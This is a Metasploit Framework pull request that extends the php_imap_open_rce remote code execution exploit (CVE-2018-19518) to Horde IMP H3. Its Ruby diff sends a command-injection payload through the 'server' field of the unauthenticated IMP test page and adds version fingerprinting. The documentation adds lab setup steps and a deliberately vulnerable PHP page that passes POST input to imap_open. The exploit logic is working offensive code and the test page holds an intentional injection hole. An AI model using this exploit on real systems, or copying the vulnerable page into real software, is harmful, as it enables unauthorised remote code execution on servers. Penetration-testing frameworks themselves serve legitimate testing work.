### PR TITLE
Horde IMP imap_open exploit

### DIFF
--- a/documentation/modules/exploit/linux/http/php_imap_open_rce.md
+++ b/documentation/modules/exploit/linux/http/php_imap_open_rce.md
@@ -10,12 +10,15 @@
 * [prestashop](https://github.com/PrestaShop/PrestaShop/blob/0d53d6b58b951ac364ad44671cf1ae9bf7ab6aed/controllers/admin/AdminCustomerThreadsController.php#L1010)
 * [SuiteCRM](https://github.com/salesagility/SuiteCRM/blob/153b2bae76097cdba9fc9c025bcd829a702b8687/modules/InboundEmail/EditView.php#L260)
 * [e107 v2](https://github.com/e107inc/e107/blob/7570b7ce4e17c03e9759c90889db8e750d566e53/e107_handlers/pop_bounce_handler.php#L83)
+* Horde IMP H3
 
   Prestashop exploitation requires the admin URI, and administrator credentials.
 
   SuiteCRM exploitation requires administrator credentials.
 
   e107 v2 exploitation requires administrator credentials.
+
+  Horde IMP H3 requires the IMP test page to be present (default), but no credentials are required.
 
   Additional applications were reported vulnerable, but exploits were not written. See [#10987](https://github.com/rapid7/metasploit-framework/pull/10987) for additional details.
 
@@ -211,18 +214,69 @@ sudo systemctl restart mysql.server
 sudo systemctl restart mysql.service
 ```
 
+### Horde IMP H3 on Ubuntu 16.04
+
+This worked until about Jan 11, 2019 when ondrej updated php5.6 passed 38.
+
+```
+sudo add-apt-repository ppa:ondrej/php
+sudo apt-get update
+sudo apt-get --no-install-recommends install -y php-pear
+sudo apt-get install -y php5.6 libapache2-mod-php5.6 php5.6-mysql php5.6-mbstring php5.6-mysql php5.6-curl php5.6-xml php5.6-xmlrpc php5.6-imap
+sudo update-alternatives --config php
+sudo a2enmod  php5.6
+sudo a2dismod php7.1
+sudo phpenmod imap
+sudo service apache2 restart
+wget ftp://ftp.horde.org/pub/imp/imp-h3-4.2.tar.gz
+wget ftp://ftp.horde.org/pub/horde/horde-3.3.13.tar.gz
+tar zxf horde-3.3.13.tar.gz
+sudo mv horde-3.3.13 /var/www/html/
+tar zxf imp-h3-4.2.tar.gz
+sudo mv imp-h3-4.2 /var/www/html/horde-3.3.13/
+sudo mv /var/www/html/horde-3.3.13/ /var/www/html/horde
+cd /var/www/html/horde
+sudo mv imp-h3-4.2/ imp
+cd imp/config
+sudo cp mime_drivers.php.dist mime_drivers.php
+sudo cp prefs.php.dist prefs.php
+sudo cp servers.php.dist servers.php
+sudo chown -R www-data:www-data /var/www/html/horde/
+curl -s http://127.0.0.1/horde/imp/test.php | grep "PHP Mail Server Support Test"
+```
+
+Browse to the site, click Administration -> Setup.  Click the caution and stop icons and then "Generate Horde Configuration", and "Generate Mail Configuration".
+The test page is located at `/horde/imp/test.php`.
+
 ### Custom Page on Ubuntu 16.04
 
 Make sure `php-imap` is installed and enabled.  Create `imap.php` with the following content.
 
-```
+```php
 <html>
   <body>
-    <p>imap_open example exploitation page.  Use URL parameter 'server'.  Ex http://1.1.1.1/imap.php?server=EXPLOITHERE</p>
+    <h1>imap_open Exploitable Page</h1>
+    <p>There are two ways to exploit this page:</p>
+    <ol>
+      <li><b>GET:</b> Use URL parameter 'server'.  Ex http://1.1.1.1/imap.php?server=EXPLOITHERE</li>
+      <li><b>POST: </b> Using parameter 'server' or the form below.</li>
+    </ol>
+    <form method="post">
+      Server: <input type="text" name="server"><br>
+      <input type="submit" value="Submit">
+    </form>
 <?php
-  $server = htmlspecialchars($_GET["server"]);
+  if (isset($_GET["server"]) && !empty($_GET["server"])) {
+    $server = htmlspecialchars($_GET["server"]);
+  } else {
+    $server = $_POST["server"];
+  }
+  if (!isset($server) || empty($server)) {
+    exit;
+  }
+  echo "<hr><h2>Results:</h2>";
   $mbox = @imap_open("{".$server.":143}INBOX",'username','password');
-  echo '<p>Received: '.$server.'</p>';
+  echo '<p><b>Received: </b>'.$server.'</p>';
 
   $errors = imap_errors();
   if (is_array($errors)) {
@@ -236,7 +290,7 @@ Make sure `php-imap` is installed and enabled.  Create `imap.php` with the follo
     $str_errors = rtrim(trim($str_errors), ',');
   }
   if (!$mbox) {
-    echo '<p>Errors: ' . ($str_errors);
+    echo '<p><b>Errors: </b>' . ($str_errors);
   }
 ?>
 

--- a/modules/exploits/linux/http/php_imap_open_rce.rb
+++ b/modules/exploits/linux/http/php_imap_open_rce.rb
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
       uri = normalize_uri(target_uri.path)
       res = send_request_cgi({'uri' => uri})
       if res && (res.code == 301 || res.code == 302)
-       return CheckCode::Detected
+        return CheckCode::Detected
       end
     elsif target.name =~ /suitecrm/
       #login page GET /index.php?action=Login&module=Users

--- a/modules/exploits/linux/http/php_imap_open_rce.rb
+++ b/modules/exploits/linux/http/php_imap_open_rce.rb
@@ -24,7 +24,10 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           'Anton Lopanitsyn', # Vulnerability discovery and PoC
           'Twoster', # Vulnerability discovery and PoC
-          'h00die' # Metasploit Module
+          'h00die', # Metasploit Module
+          'Paolo Serracino', # Horde IMP EDB
+          'Pietro Minniti', # Horde IMP EDB
+          'Damiano Proietti' # Horde IMP EDB
         ],
       'License'         => MSF_LICENSE,
       'References'      =>
@@ -32,6 +35,8 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://web.archive.org/web/20181118213536/https://antichat.com/threads/463395' ],
           [ 'URL', 'https://github.com/Bo0oM/PHP_imap_open_exploit' ],
           [ 'EDB', '45865'],
+          # This claims all versions of Horde IMP are vuln, but only H3 (~2012) and possibly older are vuln.
+          [ 'EDB', '46136'],
           [ 'URL', 'https://bugs.php.net/bug.php?id=76428'],
           [ 'CVE', '2018-19518'],
           [ 'CVE', '2018-1000859']
@@ -44,6 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'prestashop', {} ],
           [ 'suitecrm', {}],
           [ 'e107v2', {'WfsDelay' => 90}], # may need to wait for cron
+          [ 'Horde IMP H3', {}],
           [ 'custom', {'WfsDelay' => 300}]
         ],
       'PrependFork' => true,
@@ -64,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-   if target.name =~ /prestashop/
+    if target.name =~ /prestashop/
       uri = normalize_uri(target_uri.path)
       res = send_request_cgi({'uri' => uri})
       if res && (res.code == 301 || res.code == 302)
@@ -88,8 +94,17 @@ class MetasploitModule < Msf::Exploit::Remote
       if res.code = 200
         return CheckCode::Detected
       end
-   end
-   CheckCode::Safe
+    elsif target.name =~ /Horde IMP H3/
+      res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'imp', 'test.php')})
+      unless res
+        print_error('Error loading site.  Check options.')
+        return
+      end
+      if res.code == 200 && res.body =~ /PHP Mail Server Support Test/
+       return CheckCode::Appears
+      end
+    end
+  CheckCode::Safe
   end
 
   def command(spaces='$IFS$()')
@@ -337,6 +352,32 @@ class MetasploitModule < Msf::Exploit::Remote
         print_error('Triggered CSRF protection, may try exploitation manually.')
       end
       print_status('IMAP server config left on server, manual removal required.')
+    elsif target.name =~ /Horde IMP H3/
+      # The original EDB module claims "Version: All IMP versions", however the current
+      # major branch https://github.com/horde/imp/tree/74e3f5fdbac31dfcff15195832c1b9b888767982
+      # does not include any reference to imap_open, nor 'test.php' in the root directory.
+      # H5 (current) uses the IMP test url: /horde/test.php?app=imp with "Mail Server Support Test"
+      #    as the header:
+      #    https://github.com/horde/imp/blob/16400fd5f52610d27d59d21fe2e39db2c85837f1/lib/Test.php#L85
+      # H3 (~2012) uses the IMP test url: /horde/imp/test.php and "PHP Mail Server Support Test"
+      #    which are the values coded into the python edb exploit.
+      print_status("Sending Exploit Request")
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'imp', 'test.php'),
+        'vars_post' => {
+          'f_submit'    => 'Submit',
+          'passwd'      => Rex::Text.rand_text_alphanumeric(8),
+          'port'        => '143',
+          'server'      => "x #{command}}",
+          'server_type' => 'imap',
+          'user'        => Rex::Text.rand_text_alphanumeric(8)
+      })
+      unless res
+        print_error('Error loading site.  Check options.')
+        return
+      end
+      print_status(res.body)
     elsif target.name =~ /e107v2/
       # e107 has an encoder which prevents $IFS$() from being used as $ = &#036;
       # \t also became /t, however "\t" does seem to work.
@@ -366,7 +407,6 @@ class MetasploitModule < Msf::Exploit::Remote
       else
         print_error('Failed Login, check options.')
       end
-
 
       vprint_status('Checking if Cron is enabled for triggering')
       res = send_request_cgi(

--- a/modules/exploits/linux/http/php_imap_open_rce.rb
+++ b/modules/exploits/linux/http/php_imap_open_rce.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
         While many custom applications may use imap_open, this exploit works against the following applications:
         e107 v2, prestashop, SuiteCRM, as well as Custom, which simply prints the exploit strings for use.
         Prestashop exploitation requires the admin URI, and administrator credentials.
-        suiteCRM/e107/hostcms require administrator credentials.
+        suiteCRM/e107 require administrator credentials.  Fixed in php 5.6.39.
       },
       'Author' =>
         [
@@ -100,8 +100,15 @@ class MetasploitModule < Msf::Exploit::Remote
         print_error('Error loading site.  Check options.')
         return
       end
-      if res.code == 200 && res.body =~ /PHP Mail Server Support Test/
-       return CheckCode::Appears
+      major, minor = res.body.scan(/PHP Major Version: (?<major>5\.[1-6]{1})<\/li>\s+<li>PHP Minor Version: (?<minor>[\d]?\d)/).flatten
+      phpversion = "#{major}.#{minor}"
+      if res.code == 200 && res.body =~ /PHP Mail Server Support Test/ && phpversion != '.'
+        if Gem::Version.new(phpversion) < Gem::Version.new('5.6.39')
+          vprint_good("PHP Version #{phpversion} is vulnerable")
+          return CheckCode::Appears
+        else
+          vprint_bad("PHP Version #{phpversion} is NOT vulnerable, patched in 5.6.39.")
+        end
       end
     end
   CheckCode::Safe
@@ -377,7 +384,6 @@ class MetasploitModule < Msf::Exploit::Remote
         print_error('Error loading site.  Check options.')
         return
       end
-      print_status(res.body)
     elsif target.name =~ /e107v2/
       # e107 has an encoder which prevents $IFS$() from being used as $ = &#036;
       # \t also became /t, however "\t" does seem to work.


### PR DESCRIPTION
This PR does a few things:

1. removes HostCMS from the description since it wasn't applicable
2. makes a more robust exploitation test page, now accepting post requests and more prettier
3. Adds Horde IMP exploit as per the EDB module (see bullet)

* See https://github.com/rapid7/metasploit-framework/pull/11279/files#diff-22248d79397c66b46dba31246277cff0R363


One major note, w/ the install instructions, i wasn't able to install a vulnerable version of PHP, so while Ive checked the code, return values, and done my best, I didn't have a vuln php to get an actual shell on.  If you have php5.6.38 or older, please test this against it!